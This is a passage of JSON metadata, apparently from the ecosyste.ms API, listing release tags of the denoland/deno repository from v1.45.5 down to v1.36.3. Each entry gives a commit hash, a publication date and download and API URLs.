/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F